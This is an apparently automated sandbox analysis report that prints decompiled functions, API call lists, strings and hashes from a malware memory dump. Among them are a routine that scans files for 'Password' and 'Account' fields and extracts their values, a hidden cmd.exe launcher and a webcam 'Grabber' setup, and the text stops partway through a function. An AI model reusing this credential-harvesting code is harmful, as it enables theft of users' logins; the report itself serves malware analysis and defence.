0x00412deb
0x00412df1
0x00412df6
0x00412dfb
0x00412e04
0x00412e09
0x00412e0e
0x00412e14
0x00412e1e
0x00412e23
0x00412e29
0x00412e36
0x00412e4b
0x00412e59
0x00412e61
0x00412e6d
0x00412e78
0x00412e88
0x00412e8b
0x00412e8f
0x00412e97
0x00412e9c
0x00412ea1
0x00412ea3
0x00412ead
0x00412eb0
0x00412eb3
0x00412ebf
0x00412ec1
0x00412ec5
0x00000000
0x00412eca
0x00412ec5
0x00412ea1
0x00412e23
0x00412e0e
0x00412dfb
0x00412d96
0x00412d74
0x00412d54
0x00412ed1

APIs

CoInitialize.OLE32(00000000), ref: 00412D1A
CoCreateInstance.OLE32(004145A0,00000000,00000001,00417410,?,?,?), ref: 00412D32
CoCreateInstance.OLE32(004145F0,00000000,00000001,00417400,?,?,?,00414580,?,?,?), ref: 00412D8C

Part of subcall function 00412A6B: CoCreateInstance.OLE32(004145E0,00000000,00000001,004173F0,?,742FB690,00000000,00000000,?,?,004127B0), ref: 00412A99

Strings

Source, xrefs: 00412D9E
Grabber, xrefs: 00412DAC
vids, xrefs: 00412DC6

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateInstance$Initialize
String ID: Grabber$Source$vids
API String ID: 1108742289-4200688928
Opcode ID: 2d7e20f5e0ec2c28e7b84c0d761a849653f55684f2d652d219b777fb8497efb2
Instruction ID: 63471f18b460f53cd423bd4c8f0a7cd860ec001c52772ce011214a511ca997dc
Opcode Fuzzy Hash: 2d7e20f5e0ec2c28e7b84c0d761a849653f55684f2d652d219b777fb8497efb2
Instruction Fuzzy Hash: A9518F71600205AFCB14DFA4C885FDA3B75AF89704B24445DFD15AF291CBBAE891CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 046991B0, Relevance: 10.6, APIs: 7, Instructions: 137COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 046991FD

Part of subcall function 04697760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000114,74E05420,0469908D,00000000,00000000,74E5F560), ref: 04697770
Part of subcall function 04697760: _malloc.LIBCMT ref: 0469777C
Part of subcall function 04697760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 04697796
Part of subcall function 04697760: _free.LIBCMT ref: 046977A1

GetVersionExW.KERNEL32(?), ref: 04699252
GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 04699292
_free.LIBCMT ref: 046992E8

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: ByteCharMultiVersionWide_free$AttributesFile_malloc
String ID:
API String ID: 2391428990-0
Opcode ID: 3043b4ca1fac88126196c4c6e2d65d483be0c5edc4696d25f3a46d4081089cad
Instruction ID: 10c6172169e2e1d3bf35a03baedae3124ce45cc99beb0ac6b4f95c14cebc3e21
Opcode Fuzzy Hash: 3043b4ca1fac88126196c4c6e2d65d483be0c5edc4696d25f3a46d4081089cad
Instruction Fuzzy Hash: 33414EB1A112188FCF24DF6898846EDB7F8EB58325F1045AED409E3380FB746E858F54

Uniqueness

Uniqueness Score: -1.00%

Function 00407948, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64
sleepprocessmemoryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00407948(void* __eflags) {
				char _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v100;
				CHAR* _t27;

				_v8 = 0;
				L0040F7E0( &_v8);
				_t27 = VirtualAlloc(0, 0xff, 0x1000, 0x40);
				GetWindowsDirectoryA(_t27, 0x104);
				E0040102C( &(_t27[lstrlenA(_t27)]), "\\System32\\cmd.exe", 0x14);
				E00401052( &_v100, 0, 0x44);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreateProcessA(_t27, 0, 0, 0, 0, 0x8000000, 0, 0,  &_v100,  &_v24) == 0) {
					return L0040F7B9(_v8);
				}
				Sleep(0x3e8);
				return _v24.dwProcessId;
			}

0x00407956
0x00407959
0x00407971
0x00407979
0x00407990
0x0040799c
0x004079a6
0x004079aa
0x004079ab
0x004079ac
0x004079c9
0x00000000
0x004079de
0x004079d0
0x00000000

APIs

VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000040,00000000,?,?), ref: 0040796B
GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 00407979
lstrlenA.KERNEL32(00000000,\System32\cmd.exe,00000014), ref: 00407987
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004079C1
Sleep.KERNEL32(000003E8), ref: 004079D0

Strings

\System32\cmd.exe, xrefs: 00407981

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocCreateDirectoryProcessSleepVirtualWindowslstrlen
String ID: \System32\cmd.exe
API String ID: 2560724043-2003734499
Opcode ID: a57bf896a3336705eb9b682125765ae6f9619cb330a9343a21c2e3882dae45c2
Instruction ID: 58d9c2cc0fac3df26a084fe9f643917a57aa3547e5bb2355e88c07080238d8f7
Opcode Fuzzy Hash: a57bf896a3336705eb9b682125765ae6f9619cb330a9343a21c2e3882dae45c2
Instruction Fuzzy Hash: 701130F1A00208BBE711A7B5DC86FEF766CAB44748F100036F701B6191DA749E04866A

Uniqueness

Uniqueness Score: -1.00%

Function 0040990A, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040990A(char _a4, intOrPtr _a8) {
				void _v28;
				void* _t13;
				signed int _t14;

				InitializeCriticalSection( &_v28);
				_t14 = 6;
				DeleteCriticalSection(memcpy(0x54db10,  &_v28, _t14 << 2));
				EnterCriticalSection(0x54db10);
				_t5 =  &_a4; // 0x402e0d
				 *0x54db38 =  *_t5;
				GetModuleHandleA(0);
				 *0x4196a0 = 0x54d0e8;
				if(_a8 == 0) {
					E00401F76(0x54db5c);
					 *0x54d0e8 = 1;
					_t13 = E00401F4B(0x54db54, E004095AA, 0x54d0e8);
				} else {
					_t13 = E00401F4B(0x54db5c, E0040882F, 0x54d0e8);
					 *0x54dafc = 1;
				}
				LeaveCriticalSection(0x54db10);
				return _t13;
			}

0x00409916
0x0040991e
0x0040992d
0x00409939
0x0040993f
0x00409944
0x00409949
0x00409958
0x00409963
0x0040997c
0x0040998c
0x00409996
0x00409965
0x0040996b
0x00409970
0x00409970
0x0040999c
0x004099a5

APIs

InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402E0D,?,00000001,?,?), ref: 00409916
DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402E0D,?,00000001,?,?), ref: 0040992D
EnterCriticalSection.KERNEL32(0054DB10,?,00000000,?,?,?,?,00402E0D,?,00000001,?,?), ref: 00409939
GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,?,00402E0D,?,00000001,?,?), ref: 00409949
LeaveCriticalSection.KERNEL32(0054DB10,?,00000000), ref: 0040999C

Part of subcall function 00401F4B: CreateThread.KERNEL32 ref: 00401F60

Strings

.@, xrefs: 0040993F

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CriticalSection$CreateDeleteEnterHandleInitializeLeaveModuleThread
String ID: .@
API String ID: 2964645253-2319581949
Opcode ID: 79dcc80a04c4f4cfcb2c78eee28ca847cbf6ceec0d78bc80bb357a02ae004a39
Instruction ID: ece506f6ce73bbe589a0b7a088f437cf03b5d3714308d2ac1236f01bd29d78b7
Opcode Fuzzy Hash: 79dcc80a04c4f4cfcb2c78eee28ca847cbf6ceec0d78bc80bb357a02ae004a39
Instruction Fuzzy Hash: 51019275A00104ABCB10AB619C5DBDF3FB8E792328F01803AF50567291DB798485CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 00407CB7, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00407CB7(intOrPtr _a4) {
				intOrPtr* _t2;
				_Unknown_base(*)()* _t8;
				struct HINSTANCE__* _t10;

				_t2 =  *0x54e0c0;
				if(_t2 == 0) {
					L2:
					_t10 = GetModuleHandleW(L"ntdll.dll");
					 *0x54e0c0 = GetProcAddress(_t10, "RtlNtStatusToDosError");
					_t8 = GetProcAddress(_t10, "RtlSetLastWin32Error");
					_t2 =  *0x54e0c0;
					 *0x54e098 = _t8;
				} else {
					_t8 =  *0x54e098;
					if(_t8 == 0) {
						goto L2;
					}
				}
				if(_t2 != 0 && _t8 != 0) {
					return  *0x54e098( *_t2(_a4));
				}
				return _t2;
			}

0x00407cba
0x00407cc1
0x00407ccd
0x00407cd9
0x00407ced
0x00407cf8
0x00407cfa
0x00407cff
0x00407cc3
0x00407cc3
0x00407ccb
0x00000000
0x00000000
0x00407ccb
0x00407d08
0x00000000
0x00407d14
0x00407d1b

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,?,?,004086D6,00000000), ref: 00407CD3
GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 00407CE1
GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 00407CF2

Strings

RtlNtStatusToDosError, xrefs: 00407CDB
RtlSetLastWin32Error, xrefs: 00407CE7
ntdll.dll, xrefs: 00407CCE

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
API String ID: 667068680-2897241497
Opcode ID: ca2f48d9d945e85a8ca547694f7e163dfc737f3cbe43738b7c5093b57363dbe7
Instruction ID: aaa8e0cf8f8ab446e772eb97fece59f95b58d6c8f0af5f7a7dbdea8d920d86da
Opcode Fuzzy Hash: ca2f48d9d945e85a8ca547694f7e163dfc737f3cbe43738b7c5093b57363dbe7
Instruction Fuzzy Hash: 0BF030786052019BDB145FB5AC0AAB73BB8BED5B45310443AF81DD33A0D77498459A29

Uniqueness

Uniqueness Score: -1.00%

Function 00409ADF, Relevance: 9.2, APIs: 6, Instructions: 229
fileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00409ADF(intOrPtr __ecx, CHAR* _a4) {
				intOrPtr _v12;
				long _v16;
				void* _v20;
				long _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr _t96;
				void* _t102;
				char _t104;
				void* _t125;
				intOrPtr _t127;
				char _t128;
				long _t133;
				void* _t135;
				intOrPtr _t136;
				void* _t141;
				void* _t146;
				void* _t147;
				intOrPtr* _t165;
				intOrPtr* _t167;
				void* _t168;
				void* _t169;
				void* _t170;
				void* _t172;
				intOrPtr* _t173;
				void* _t174;
				intOrPtr _t175;
				intOrPtr* _t177;
				CHAR* _t178;
				void* _t179;
				void* _t180;

				_v36 = __ecx;
				_t174 = CreateFileA(_a4, 0x80000000, 7, 0, 3, 0, 0);
				if(_t174 != 0xffffffff) {
					_t133 = GetFileSize(_t174, 0);
					_v16 = _t133;
					_t172 = E00401085(_t133);
					_v32 = _t172;
					E00401052(_t172, 0, _t133);
					_v24 = _v24 & 0x00000000;
					_t180 = _t179 + 0x10;
					ReadFile(_t174, _t172, _t133,  &_v24, 0);
					CloseHandle(_t174);
					_t175 = E00405EB4(0x400000);
					_v28 = _t175;
					_a4 = E00405EB4(0x104);
					_t96 = E00405EB4(0x104);
					_t141 = 0;
					_v12 = _t96;
					_t135 = 0;
					__eflags = _v16;
					if(_v16 <= 0) {
						L36:
						L00405EA5(_a4);
						L00405EA5(_v12);
						L00405EA5(_t175);
						return E00401099(_t172);
					} else {
						goto L3;
					}
					do {
						L3:
						_t167 =  *((intOrPtr*)(_t135 + _t172));
						_t13 = _t167 - 0x21; // -33
						__eflags = _t13 - 0x5d;
						if(_t13 > 0x5d) {
							goto L28;
						}
						__eflags = _t167 - 0x3d;
						if(_t167 == 0x3d) {
							goto L28;
						}
						 *((char*)(_t141 + _t175)) = _t167;
						_t141 = _t141 + 1;
						__eflags = _t167;
						if(_t167 != 0) {
							__eflags =  *((char*)(_t141 + _t175 - 8)) - 0x50;
							if( *((char*)(_t141 + _t175 - 8)) != 0x50) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 7)) - 0x61;
							if( *((char*)(_t141 + _t175 - 7)) != 0x61) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 6)) - 0x73;
							if( *((char*)(_t141 + _t175 - 6)) != 0x73) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 5)) - 0x73;
							if( *((char*)(_t141 + _t175 - 5)) != 0x73) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 4)) - 0x77;
							if( *((char*)(_t141 + _t175 - 4)) != 0x77) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 3)) - 0x6f;
							if( *((char*)(_t141 + _t175 - 3)) != 0x6f) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 2)) - 0x72;
							if( *((char*)(_t141 + _t175 - 2)) != 0x72) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 1)) - 0x64;
							if( *((char*)(_t141 + _t175 - 1)) == 0x64) {
								__eflags =  *_t172 - 0xd0;
								_t102 = 2;
								_t146 = 9;
								_t103 =  !=  ? _t146 : _t102;
								_t168 = 0;
								_t147 = ( !=  ? _t146 : _t102) + _t135;
								_t104 =  *((intOrPtr*)(_t147 + _t172));
								__eflags = _t104 - 0x20;
								if(_t104 <= 0x20) {
									L35:
									__eflags = 0;
									_v52 = 0;
									_v48 = 0;
									_v44 = 0;
									 *((char*)(_t168 + _v12)) = 0;
									E004033BF( &_v20, _v12);
									E004033BF( &_v16, _a4);
									E00403437( &_v44, E0040309D( &_v20, __eflags,  &_v32));
									L00405EA5(_v32);
									E00403437( &_v48, E0040309D( &_v16, __eflags,  &_v32));
									L00405EA5(_v32);
									_v40 = 5;
									E00403437( &_v52, E004035E5( &_v32, 0x414648));
									L00405EA5(_v32);
									L00401F95(_t180 - 0x10,  &_v52);
									L00401FCB(_v36);
									L00405EA5(_v16);
									L00405EA5(_v20);
									E004013EF( &_v52);
									goto L36;
								}
								_t136 = _v12;
								_t165 = _t147 + _t172;
								__eflags = _t165;
								while(1) {
									__eflags = _t104 - 0x7f;
									if(_t104 >= 0x7f) {
										goto L35;
									}
									__eflags = _t104 - 0x21;
									if(_t104 == 0x21) {
										goto L35;
									}
									 *((char*)(_t168 + _t136)) = _t104;
									_t168 = _t168 + 1;
									_t165 = _t165 + 1;
									_t104 =  *_t165;
									__eflags = _t104 - 0x20;
									if(_t104 > 0x20) {
										continue;
									}
									goto L35;
								}
								goto L35;
							}
							goto L28;
						}
						__eflags = _t141 - 7;
						if(_t141 <= 7) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 7)) - 0x41;
						if( *((char*)(_t141 + _t175 - 7)) != 0x41) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 6)) - 0x63;
						if( *((char*)(_t141 + _t175 - 6)) != 0x63) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 5)) - 0x63;
						if( *((char*)(_t141 + _t175 - 5)) != 0x63) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 4)) - 0x6f;
						if( *((char*)(_t141 + _t175 - 4)) != 0x6f) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 3)) - 0x75;
						if( *((char*)(_t141 + _t175 - 3)) != 0x75) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 2)) - 0x6e;
						if( *((char*)(_t141 + _t175 - 2)) != 0x6e) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 1)) - 0x74;
						if( *((char*)(_t141 + _t175 - 1)) != 0x74) {
							goto L28;
						}
						__eflags =  *_t172 - 0xd0;
						_t125 = 2;
						_t169 = 9;
						_t126 =  !=  ? _t169 : _t125;
						_t170 = 0;
						_t127 = ( !=  ? _t169 : _t125) + _t135;
						_v20 = _t127;
						_t128 =  *((intOrPtr*)(_t127 + _t172));
						__eflags = _t128 - 0x20;
						if(_t128 <= 0x20) {
							L19:
							 *((char*)(_t170 + _a4)) = 0;
							goto L28;
						}
						_t177 = _v20 + _t172;
						__eflags = _t177;
						_v20 = _t177;
						_t173 = _t177;
						_t178 = _a4;
						while(1) {
							__eflags = _t128 - 0x7f;
							if(_t128 >= 0x7f) {
								break;
							}
							_t173 = _t173 + 1;
							 *((char*)(_t170 + _t178)) = _t128;
							_t170 = _t170 + 1;
							_t128 =  *_t173;
							__eflags = _t128 - 0x20;
							if(_t128 > 0x20) {
								continue;
							}
							break;
						}
						_t175 = _v28;
						_t172 = _v32;
						goto L19;
						L28:
						_t135 = _t135 + 1;
						__eflags = _t135 - _v16;
					} while (_t135 < _v16);
					goto L36;
				}
				GetLastError();
				return CloseHandle(_t174);
			}

0x00409aea
0x00409b02
0x00409b07
0x00409b23
0x00409b26
0x00409b2f
0x00409b34
0x00409b37
0x00409b3c
0x00409b43
0x00409b4c
0x00409b53
0x00409b63
0x00409b6c
0x00409b76
0x00409b79
0x00409b7e
0x00409b80
0x00409b85
0x00409b87
0x00409b8a
0x00409d75
0x00409d78
0x00409d80
0x00409d87
0x00000000
0x00000000
0x00000000
0x00000000
0x00409b90
0x00409b90
0x00409b90
0x00409b93
0x00409b96
0x00409b98
0x00000000
0x00000000
0x00409b9e
0x00409ba1
0x00000000
0x00000000
0x00409ba7
0x00409baa
0x00409bab
0x00409bad
0x00409c4c
0x00409c51
0x00000000
0x00000000
0x00409c53
0x00409c58
0x00000000
0x00000000
0x00409c5a
0x00409c5f
0x00000000
0x00000000
0x00409c61
0x00409c66
0x00000000
0x00000000
0x00409c68
0x00409c6d
0x00000000
0x00000000
0x00409c6f
0x00409c74
0x00000000
0x00000000
0x00409c76
0x00409c7b
0x00000000
0x00000000
0x00409c7d
0x00409c82
0x00409c93
0x00409c98
0x00409c9b
0x00409c9c
0x00409c9f
0x00409ca1
0x00409ca4
0x00409ca7
0x00409ca9
0x00409cc3
0x00409cc6
0x00409cc8
0x00409ccb
0x00409cce
0x00409cd1
0x00409cd8
0x00409ce3
0x00409cf8
0x00409d00
0x00409d15
0x00409d1d
0x00409d2a
0x00409d3a
0x00409d42
0x00409d50
0x00409d58
0x00409d60
0x00409d68
0x00409d70
0x00000000
0x00409d70
0x00409cab
0x00409cae
0x00409cae
0x00409cb0
0x00409cb0
0x00409cb2
0x00000000
0x00000000
0x00409cb4
0x00409cb6
0x00000000
0x00000000
0x00409cb8
0x00409cbb
0x00409cbc
0x00409cbd
0x00409cbf
0x00409cc1
0x00000000
0x00000000
0x00000000
0x00409cc1
0x00000000
0x00409cb0
0x00000000
0x00409c82
0x00409bb3
0x00409bb6
0x00000000
0x00000000
0x00409bbc
0x00409bc1
0x00000000
0x00000000
0x00409bc7
0x00409bcc
0x00000000
0x00000000
0x00409bd2
0x00409bd7
0x00000000
0x00000000
0x00409bdd
0x00409be2
0x00000000
0x00000000
0x00409be8
0x00409bed
0x00000000
0x00000000
0x00409bf3
0x00409bf8
0x00000000
0x00000000
0x00409bfe
0x00409c03
0x00000000
0x00000000
0x00409c05
0x00409c0a
0x00409c0d
0x00409c0e
0x00409c11
0x00409c13
0x00409c15
0x00409c18
0x00409c1b
0x00409c1d
0x00409c41
0x00409c44
0x00000000
0x00409c48
0x00409c22
0x00409c22
0x00409c24
0x00409c27
0x00409c29
0x00409c2c
0x00409c2c
0x00409c2e
0x00000000
0x00000000
0x00409c30
0x00409c31
0x00409c34
0x00409c35
0x00409c37
0x00409c39
0x00000000
0x00000000
0x00000000
0x00409c39
0x00409c3b
0x00409c3e
0x00000000
0x00409c84
0x00409c84
0x00409c85
0x00409c85
0x00000000
0x00409c8e
0x00409b09
0x00000000

APIs

CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000,00000000,7673C620,?), ref: 00409AFC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00409E9C,?), ref: 00409B09
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00409E9C,?), ref: 00409B10
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00409E9C,?), ref: 00409B1D
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00409B4C
CloseHandle.KERNEL32(00000000), ref: 00409B53

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseHandle$CreateErrorLastReadSize
String ID:
API String ID: 1366138817-0
Opcode ID: c54c2947902b50fcecd51b9520cc2abbffe43babc5dd97c6831bbf5dff85adac
Instruction ID: 104b88514deac065fe8cd1f3a748688661c759891a47cef897251ecb07377383
Opcode Fuzzy Hash: c54c2947902b50fcecd51b9520cc2abbffe43babc5dd97c6831bbf5dff85adac
Instruction Fuzzy Hash: 2281E070C082456EFF259BA8D845AAF7FA5AF41318F10807FE4417A2D3CB7D1E428B59

Uniqueness

Uniqueness Score: -1.00%

Function 04698500, Relevance: 9.2, APIs: 6, Instructions: 195fileCOMMON

Download Yara Rule

APIs

UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 046985AB
GetLastError.KERNEL32 ref: 046985D6

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: ErrorFileLastUnlock
String ID:
API String ID: 3655728120-0
Opcode ID: cec1ae8da7ad0151486cad350d11db53a39e9510296e9ab0f3310c95ce15a7b4
Instruction ID: 39f404af0bf7a217866b5e187a79fb0e215f2e507bb739cfebfccfdd7f757b81
Opcode Fuzzy Hash: cec1ae8da7ad0151486cad350d11db53a39e9510296e9ab0f3310c95ce15a7b4
Instruction Fuzzy Hash: 5171F471A10205DFDF90DF69C884AAABBF9EF59354F158469E809DB300F7B4EA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04698780, Relevance: 9.2, APIs: 6, Instructions: 164fileCOMMON

Download Yara Rule

APIs

GetFileSize.KERNEL32(?,00000000), ref: 046987EB
GetLastError.KERNEL32 ref: 046987F8
CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 046988B4
MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 046988DC
GetLastError.KERNEL32 ref: 04698906
CloseHandle.KERNEL32(00000000), ref: 0469891C

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: File$ErrorLast$CloseCreateHandleMappingSizeView
String ID:
API String ID: 1258392467-0
Opcode ID: b498c58cf2dddffeafc5de830780f5578c80a7c8f1bd06b3dfb3cbc00ed81b61
Instruction ID: 92c748d0ee7897c88b03e8a821c3b69a1562297928fbb53b3543449ced1ae15a
Opcode Fuzzy Hash: b498c58cf2dddffeafc5de830780f5578c80a7c8f1bd06b3dfb3cbc00ed81b61
Instruction Fuzzy Hash: 0D514AB0611701CBDB24DF29D980A5AB7E8FF95314F04892DE89287740EBB4FD45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 046F6E64, Relevance: 9.1, APIs: 6, Instructions: 98COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 046F6E72

Part of subcall function 046F923C: __mtinitlocknum.LIBCMT ref: 046F9252
Part of subcall function 046F923C: __amsg_exit.LIBCMT ref: 046F925E
Part of subcall function 046F923C: EnterCriticalSection.KERNEL32(00000000,00000000,?,046F7AC4,00000006,047094A0,00000008,046F655B,00000000,?,?,000003E8,00000000), ref: 046F9266

DecodePointer.KERNEL32(04709460,00000020,046F6FB5,00000008,00000001,00000000,?,046F6FE6,000000FF,?,046F9263,00000011,00000000,?,046F7AC4,00000006), ref: 046F6EAE
DecodePointer.KERNEL32(?,046F6FE6,000000FF,?,046F9263,00000011,00000000,?,046F7AC4,00000006), ref: 046F6EBF

Part of subcall function 046F7FF2: RtlEncodePointer.NTDLL(00000000,046F9841,0470DD38,00000314,00000000,?,?,?,?,?,046F714A,0470DD38,Microsoft Visual C++ Runtime Library,00012010), ref: 046F7FF4

DecodePointer.KERNEL32(-00000004,?,046F6FE6,000000FF,?,046F9263,00000011,00000000,?,046F7AC4,00000006), ref: 046F6EE5
DecodePointer.KERNEL32(?,046F6FE6,000000FF,?,046F9263,00000011,00000000,?,046F7AC4,00000006), ref: 046F6EF8
DecodePointer.KERNEL32(?,046F6FE6,000000FF,?,046F9263,00000011,00000000,?,046F7AC4,00000006), ref: 046F6F02

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2005412495-0
Opcode ID: dc3a3976b1c6cbed597c8b1633151340b1b850cd327f25509f6380bd7b8406e6
Instruction ID: 9e84e269b1a199a724c28aefc91fa44e9c801ec9039f6325410bb3b560143d95
Opcode Fuzzy Hash: dc3a3976b1c6cbed597c8b1633151340b1b850cd327f25509f6380bd7b8406e6
Instruction Fuzzy Hash: CC311F71D02349DFEF109FA9DC846DD7BF1BF08315F10842AD690A6290EBB5A886CF59

Uniqueness

Uniqueness Score: -1.00%

Function 046FA43A, Relevance: 9.0, APIs: 6, Instructions: 47COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 046FA446

Part of subcall function 046F81A5: __getptd_noexit.LIBCMT ref: 046F81A8
Part of subcall function 046F81A5: __amsg_exit.LIBCMT ref: 046F81B5

__amsg_exit.LIBCMT ref: 046FA466
__lock.LIBCMT ref: 046FA476
InterlockedDecrement.KERNEL32(?), ref: 046FA493
_free.LIBCMT ref: 046FA4A6
InterlockedIncrement.KERNEL32(048C15F8), ref: 046FA4BE

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: b56ba37cea0513e024f15d6b764172c5e5691621443e85315bdc0d5d6df5b654
Instruction ID: 8138c9cb0f1991f4a00619cd89564ddf07bcf447cfc1ff222d7c5cfbeb021869
Opcode Fuzzy Hash: b56ba37cea0513e024f15d6b764172c5e5691621443e85315bdc0d5d6df5b654
Instruction Fuzzy Hash: 1601A172902711DBEB25FFA4DC4879D7760AF01724F048109DA88A3B81EB38B981CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 046BD4A0, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 264COMMON

Download Yara Rule

Strings

%r ORDER BY term does not match any column in the result set, xrefs: 046BD79A
%r %s BY term out of range - should be between 1 and %d, xrefs: 046BD5AB
too many terms in ORDER BY clause, xrefs: 046BD4D3
ORDER, xrefs: 046BD5A4

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID:
String ID: %r %s BY term out of range - should be between 1 and %d$%r ORDER BY term does not match any column in the result set$ORDER$too many terms in ORDER BY clause
API String ID: 0-3892209816
Opcode ID: f14207093269b4279a5b9afea30ca12047cc833eb95d71b24e2ea21643735d9a
Instruction ID: c8d0bb48ddc9943ca3fdf6b74b9371f7ee53bbff028a4a67c78cec980e112989
Opcode Fuzzy Hash: f14207093269b4279a5b9afea30ca12047cc833eb95d71b24e2ea21643735d9a
Instruction Fuzzy Hash: 4BA17D756042429FD710CF29C480AAAB7E4EF89318F18856DE8D99B341E335F986CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 046AD660, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON

Download Yara Rule

Strings

database corruption at line %d of [%.10s], xrefs: 046AD771, 046AD83A
ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 046AD767, 046AD830

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID:
String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
API String ID: 0-1231421067
Opcode ID: 88bb617e4612405759db8b3234b0f1f83d61cff21a81ff782c5f20d3f4974873
Instruction ID: 4ee5bad72ba9039d13b1fa23fe7f94b34aa2ef508de8b277a6a41d12ad122415
Opcode Fuzzy Hash: 88bb617e4612405759db8b3234b0f1f83d61cff21a81ff782c5f20d3f4974873
Instruction Fuzzy Hash: 74818CB1A04700AFD710DF18C880A1AB7E6BF88718F148A6DF9989B751E771EC55CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00410B2A, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 61
windowCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00410B2A(void* __ecx, void* __eflags) {
				void* _v8;
				char _v12;
				char _v16;
				intOrPtr _v40;
				char _v44;
				void* _t15;
				intOrPtr* _t16;
				intOrPtr _t34;
				void* _t45;

				_t45 = __eflags;
				_t15 = E0041094E();
				_push(__ecx);
				_t16 = E00410969(_t15, "VirtualQuery", _t45);
				if(_t16 != 0) {
